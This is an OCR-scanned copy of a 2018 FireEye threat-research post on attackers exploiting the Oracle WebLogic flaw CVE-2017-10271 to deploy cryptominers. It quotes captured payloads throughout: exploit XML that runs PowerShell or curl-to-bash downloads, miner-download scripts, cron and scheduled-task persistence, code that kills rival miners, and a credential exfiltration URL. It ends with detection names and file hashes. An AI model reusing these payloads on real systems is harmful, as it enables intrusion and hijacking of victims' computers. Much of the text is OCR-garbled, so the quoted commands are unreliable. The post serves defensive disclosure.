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Introduction 

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency 
miners. 

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS 
Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute 
arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to 
patch their systems may find themselves mining cryptocurrency for threat actors. 

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public 
posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download 
cryptocurrency miners in victim environments. 

We saw evidence of organizations located in various countries - including the United States, Australia, Hong Kong, 
United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical - being impacted 
by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than 
specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests 
that the external targeting calculus of these attacks is indiscriminate in nature. 

The recent cryptocurrency boom has resulted in a growing number of operations - employing diverse tactics - 
aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with 
the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns. 

Tactic #1: Delivering the miner directly to a vulnerable server 

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner 
directly onto the victim’s system (Figure 1), and executing it using ShellExecute(). 


https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html 


1/10 





3/7/2018 CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining « CVE-2017-10271 Used to ... 


Connection: fceep-a1ive 
Content-Type; text/xml 
Cont &nt - Len gt h: S00 

< xmlns:5oapenv»”http;//schemas . xmlsoap . org/soap/envelope/”> 

< ■ . r--v;--" > 

< xmln s:work="http://bea.c om/2004/66/soa p/wo rka re a/ "> 

< versIOil-'l.S.flLOl" class*”java .beans.J<jMLDecoder ,l > 

< class= H java . lang T ProcessBuilder“> 

< class-"java.lang.String" length- n, 3”> 

< oid index="0 ,l > 

< >power*5hell</ > 

</ :id> 

< index= i, l ,l > 

< >-COflWafld</ . :> 

</void> 

< d index=*'2"> 

< >(New-0bject System.Net.WebClient) .DownloadFile( ‘http:// 'cranberry, exe"/logic .exe' 

( Hew-Ob j &ct -con S hel 1 * Applic at ion ) + % he HE xe c ute ( 1 log ic t &xe " ); 

</string> 

</ ;oid> 

</arra > 

< jLi method="start F 7></ ... > 

</javd> 

</ itext> 

</: oa: > 

<SO,“! : 

</soapenv:Envelope> 


Figure 1: Downloading the payload directly 

Tactic #2: Utilizing PowerShell scripts to deliver the miner 

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly 
(Figure 2). 


< class-"java.lang.ProcessBuilder"> 

< class=”java . lang.String” length="3”> 

< index="0 rr > 

< sti-in >cmd</5tring> 

</ ci > 

< index="l”> 

< >fc</ > 

< f oi > 

< index="2 rr > 


< >powershell IEX (New-Object Net.WebQient).DownloadString( ‘http:// 

</ > 

</array> 

< raiethod- ,r start P 7></ > 

■ 8220/1.psl‘)</ > 


Figure 2: Exploit delivering PowerShell script 


This script has the following functionalities: 

• Downloading miners from remote servers 
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$noutput - "$env:THP am.exe" 

$vc = New-Object System . Net . WebClient 
$vc.DownloadFile($nurl > $noutput) 
copy $ne $HOME\SchTask.psl 
copy $env:TMP\yam.exe $enviTMP\xe.exe 


Figure 3: Downloading cryptominers 

As shown in Figure 3, the .psl script tries to download the payload from the remote server to a vulnerable 
server. 

• Creating scheduled tasks for persistence 


Schlasks.exe /Create /SC MINUTE /TN "Update service for Oracle products!" /Tft "PowerSiielI.exe -ExecutionPalicy hyp a 55 -windowstyle hidden -n&exit -File $FOtE chTaskLpsl" /MO 6 /F 


Figure 4: Creation of scheduled task 


• Deleting scheduled tasks of other known cryptominers 


SchTask;,?*? /Create /SC MIWTE "Powers'Ll, exe -EweeutionPolicy bypass -wirdowstyle Hidden -nooxit -File SHQHf >chTaskl.psl" /M0 ft /F 

SchTaiks.exe /Delete /TN “Update service for Oracle products" /F 
SchTask? .PKP /Delete /TH "jlnHaf-P ^irp far nn^rlp nrnri.irtgS" it 
$chTasks r e)te /Delete /TN 

SchTasks.exe /Delete /Tn ’CpcTafrTervTce tor Oracle producHTTF 
SchTasks.exe /Delete /TN "Update service for Oracle products3" /f 
SchTisks.exe /Delete /TN "Update service for Oracle products*" /F 
SchTasks.exe /Delete /TN "Update service for Oracle products?" /F 
5chTasks.exe /Delete /IN "Update service for Oracle productsE" /F 
SchTasks.exe /Delete /TN "Update service for Oracle products®" /F 


Figure 5: Deletion of scheduled tasks related to other miners 


In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle productsl". In 
Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for 
Oracle productsa”. 

From this, it’s quite clear that different attackers are fighting over the resources available in the system. 

• Killing processes matching certain strings associated with other cryptominers 
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cmd.exe /C taskkill 
cmd.exe /C taskkill 
cmd.exe /C taskkill 
cmd.exe /C taskkill 
cmd.exe /C taskkill 
cmd.exe /C taskkill 
cmd.exe /C taskkill 
cmd.exe /C taskkill 
cmd.exe /€ taskkill 
cmd.exe /C taskkill 


Figure 6: Terminating processes directly 


/IM xmrig.exe /f 

/IM nscpucnminer32.exe /f 

/IM Ie.exe /f 

/IM iie.exe /f 

/IM 3.exe /f 

/IM iee.exe /f 

/IM ie.exe /f 

/IM je.exe /f 

/IM ie.exe /f 

/IM iexplorer.exe / f 


{counters = (Get-Counter \Ppocess(*)\% Processor Time ). CounterSamples 

{malwares - 'Silence /Carbon / nscpucnmirier64 / mrservicehost /servisce' 3 miner64 \ thunderplatform / xmrig32 \ ’ cpuminer minergate 3 
foreach {{counter in {counters) { 
if ({counter.CoolcedValue -g$ 5G) { 

if {{counter.InstanceMarne -eg idle' -Or {counter.InstanteName -eq "_total ') { 
continue 

} 

foreach ((malware in Malwares) { 
if ((counter.InstanceName -eq (malware) { 

Stop-Process -processname (counter .Inst ariceNanie -Force 

} 

} 

} 

} 


Figure 7: Terminating processes matching certain strings 


Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 

7). 

• Connects to mining pools with wallet key 



Figure 8: Connection to mining pools 


The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other 
observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for 
wallet key, -p for password of mining server, and -t for limiting the number of miner threads. 

• Limiting CPU usage to avoid suspicion 


cmd.exe /c ienv iprograffldataYspoosvc .exe -o pool.supportxmr.com -u -p n -k -B 


-donate-level=l 





Figure 9: Limiting CPU Usage 
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hternamiue 

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and 
the EternalBlue vulnerability (CVE-2017-0144). 

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab 
from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of 
established non-loopback network connections. Every IP address is then tested with extracted credentials and a 
credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 
server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation). 

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from 
Mimikatz in order to download and execute the malware in remote systems. 

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 
'http://<C2>:8000/api.php?data=<credential data>'. 

If the lateral movement with credentials fails, then the malware uses PingCastle MSI 7-010 scanner (PingCastle is a 
French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and 
uses it to spread to that host. 

After all network derived IPs have been processed, the malware generates random IPs and uses the same 
combination of PingCastle and EternalBlue to spread to that host. 

Tactic #4: Scenarios observed in Linux OS 

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality 
similar to the PowerShell scripts. 
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< cla55="java . lang. String” length="3'‘> 

< index="0"> 

< >/bin/bash</ > 

</ > 

< index= ,r l"> 

< >-€</ ■> 

</ cid> 

< ; id index="2"> 

< >curl http:// /css/lower.css |bash</ > 

</ id> 

c/ ^ 

< method="start ,f / ></ > 

</ > 


Figure 10: Delivery of shell scripts 


The shell script performs the following activities: 

• Attempts to kill already running cryptominers 


pkill -f cpuloadtest 
pkill -f crypto-pool 
pkill -f xmr 
pkill «f prohash 
pkill -f monero 
pkill -f miner 
pkill -f nanopool 
pkill -f minergate 
pkill -f yam 
pkill -f Silence 
pkill -f yam2 
pkill -f minerd 
pkill -f Circle_MI.png 
pkill -i curl 

ps aux+|grep -v greplgrep "mine-moneropool.com" | awk "{print $2} | xargs kill -9 

ps auxf|grep -v greplgrep crypto-pool 1 1 awk {print $2} | xargs kill -9 

ps auxf|grep greplgrep prohash’ |awk {print $2} [xargs kill -9 

ps auxf|grep -v greplgrep monero' [awk {print $2] [xargs kill -9 

ps auxf|grep -v grcpjgrep miner |awk '{print $2} [xargs kill -9 

ps auxf|grep -v greplgrep nanopool |awk {print $2} |xargs kill -9 

ps auxf|grep -v greplgrep minergate |awk {print $2} |xargs kill -9 

ps auxfjgrep -v greplgrep xmr,crypto-pool-fr:3080 |awk {print $2} [xargs kill -9 


Figure 11: Terminating processes matching certain strings 


• Downloads and executes cryptominer malware 
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wget -P ftmpf curl http; : 'css/mitsyslog chmnd /tup/ init sy5 log 

rm -rf /trrp/initsyslog. * 
fi 

/tmp/initsyslog & 

else 

p-Hps aux | grep initsyslog | grep ~v grep | we -1) 
if [ ${p} -eq 1 ]; then 

echo "initsyslog" 
elif [ ${p} -eq 0 ];then 
/Imp initsyslog & 

else 

echo "" 
fi 
fi 


Figure 12: Downloading CryptoMiner 


• Creates a cron job to maintain persistence 


CRON () { 

if [ -x /usr/bin/wget ] ; then 

echo */8 * * * * wget -q -0 - $H0ST/robots,txt|bash > /tmp/.$LFILE_NAME.cron 
elif [ -x /usr/bin/curl ] ; then 

echo *78 * * * * curl $HGST/robots.txt | bash > /tmp/,$LFILE_NAME.cron 

else 

exit 0; 
fi 

crontab -r 

crontab /tmp/ . $LFILE_NAME . cron 
rm /tmp/ * $LFILE_NAME . cron 

i 


Figure 13: Cron job for persistence 


• Tries to kill other potential miners to hog the CPU usage 


function kills () { 

bin ps exf -o "pid ^cpu command 1 ' |grep -v initsyslog j awk '{if ($2>60. 0) print $1} T J while read procid 
do 

kill -9 Jprocid 
done 


Figure 14: Terminating other potential miners 


The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. 
This terminates other potential miners and maximizes the utilization of resources. 

Conclusion 

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make 
money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential 
profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as 
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Noiaoiy, crypiocurrency mining maiware is oemg aisiriouiea using various lacucs, lypicany in an opportunistic ana— 

indiscriminate manner so cyber criminals will maximize their outreach and profits. 

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats 
at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner 
tries to connect to mining pools. 

At the time of writing, FireEye HX detects this activity with the following indicators: 


Detection Name 


POWERSHELL DOWNLOADER 
(METHODOLOGY) 


MONERO MINER (METHODOLOGY) 


MIMIKATZ (CREDENTIAL STEALER) 


Indicators of Compromise 


MD5 

Name 

3421A769308D39D4E9C7E8CAECAF7FC4 

cranberry.exe/logic.exe 

B3A831BFA590274902C77B6C7D4C31AE 

xmrig.exe/yam.exe 

26404FEDE71F3F713175A3A3CEBC619B 

l.psl 

D3D10FAA69A10AC754E3B7DDE9178C22 

2.ps1 

9C91B5CF6ECED54ABB82D1050C5893F2 

info3.ps1 

3AAD3FABF29F9DF65DCBD0F308FF0FA8 

info6.ps1 

933633F2ACFC5909C83F5C73B6FC97CC 

lower.css 

B47DAF937897043745DF81F32B9D7565 

lib.css 
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I hanks to Uileep Kumar Jallepalli and Charles (Jarmakal tor their help in the analysis. 

This entry was posted on Thu Feb 15 11:30 EST 2018 and filed under Kimberly Goody, Malware, Akhil Reddy, 
cryptocurrency, cryptocurrency mining, and Rakesh Sharma. 
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